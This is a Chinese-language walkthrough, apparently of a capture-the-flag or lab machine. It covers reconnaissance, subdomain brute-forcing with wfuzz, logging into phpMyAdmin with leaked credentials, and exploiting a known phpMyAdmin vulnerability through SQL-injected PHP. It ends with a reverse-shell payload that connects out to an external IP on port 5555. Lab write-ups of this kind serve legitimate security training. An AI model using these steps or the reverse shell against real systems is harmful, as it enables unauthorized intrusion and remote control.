一、通过扫描同段IP,得到靶机IP地址
开发的端口信息
通过扫描目录,拼接目录没有发现信息
但是找到了数据库敏感信息
二、通过观察页面,发现有个域名绑定的点
进行hosts绑定
进行域名访问
进行子域名爆破
试了好多种都不行,根据提示下载了个地址
wfuzz -H 'HOST:FUZZ.votenow.local' -u 'http://192.168.40.143' -w /home/kali/Desktop/SecLists-2024.2/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 854,45
成功爆出来一个子域名
三、进行hosts绑定子域名,访问
是个数据库登录页面,通过之前发现的数据库信息,登录
成功登录
通过查看页面,发现有个users表
解密密码,解不出来
查看数据库版本
利用漏洞工具直接搜索相关漏洞
kali: searchaploit phpmyadmin
找到相对应的版本
查看该文件路径,并且查看
locate 44928.txt
phpadmin执行sql语句
select '<?php phpinfo();exit;?>'
然后要找到执行命令的session值
浏览器访问
成功解析
将执行语句换成一句话木马
select '<?php system("bash -i >& /dev/tcp/47.99.195.123/5555 0>&1");exit;?>'
浏览器重新访问